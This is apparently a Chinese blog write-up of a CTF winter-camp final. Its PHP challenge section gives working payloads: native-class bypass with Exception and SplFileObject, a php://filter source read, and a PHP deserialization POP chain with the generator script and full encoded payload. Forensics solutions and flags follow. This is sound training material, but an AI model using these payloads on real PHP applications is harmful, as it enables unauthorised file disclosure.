第2届山石CTF冬令营结营赛wp

Primitive php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
highlight_file(__FILE__);
//hint.php
foreach ($_GET as $value) {
    if(preg_match("/flag/",$value)){
        die("不可以看flag啦,阿sir");
    }

}
$a = new $_GET['class1']($_GET['a']);$b = new $_GET['class2']($_GET['b']);
if ($a !== $b and md5($a)===md5($b))
{
    echo new $_GET['class3']($_GET['c']);
}

原生类绕过:参考:https://blog.csdn.net/qq_63928796/article/details/127786521
?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
filter流伪协议读到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
echo "no hint";
class blue
{
    public $b1;
    public $b2;

    function eval() {
        echo new $this->b1($this->b2);
    }

    public function __invoke()
    {
        $this->b1->blue();
    }
}

class red
{
    public $r1;

    public function __destruct()
    {
        echo $this->r1 . '0xff0000';
    }

    public function execute()
    {
        ($this->r1)();
    }

    public function __call($a, $b)
    {
        echo $this->r1->getFlag();
    }

}

class white
{
    public $w;

    public function __toString()
    {
        $this->w->execute();
        return 'hello';
    }
}
class color
{
    public $c1;

    public function execute()
    {
        ($this->c1)();
    }

    public function getFlag()
    {
        echo file_get_contents($this->c1);
    }

}

unserialize($_POST['cmd']);

反序列化构造payload
参考:
https://blog.csdn.net/cosmoslin/article/details/123829951
构造伪协议读取flagphp://filter/convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}
$f = new color("php://filter/convert.base64-encode/resource=flag.php");  
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo (urlencode(serialize($a)));


unserialize($_POST['cmd']);post传参cmd
payload:
cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D


:::tips
HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}
:::

extract

用工具cloakify
kali:


打开保存的文件

改后缀zip

zip套娃,文件名递减1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import zipfile

count = 2331
while count>0:
    path = 'f'+ str(count) + '.zip'
    folder_abs = '.'

    zip_file = zipfile.ZipFile(path)
    zip_list = zip_file.namelist()

    for f in zip_list:
        zip_file.extract(f, folder_abs)
     
    zip_file.close()
    count -= 1

得到
:::tips
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}
:::

签到题


:::tips
hsnctf{welcome_to_hsnctf}
:::

外星电波~


得到一个加密的压缩包
NTFS数据流加密

得到音频,导出,sstv读

解压缩包得到flag
:::tips
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}
:::

daobudao



:::tips
hsnctf{g00d_luck_have_fun}
:::

S7_analysis

随便翻翻,看见一个stop

:::tips
hsnctf{399}
:::

CTF > 比赛Write Up
#比赛Write Up
第2届山石CTF冬令营结营赛wp
http://example.com/2023/02/05/第2届山石CTF冬令营结营赛wp/
作者
J_0k3r
发布于
2023年2月5日
许可协议
BY J_0K3R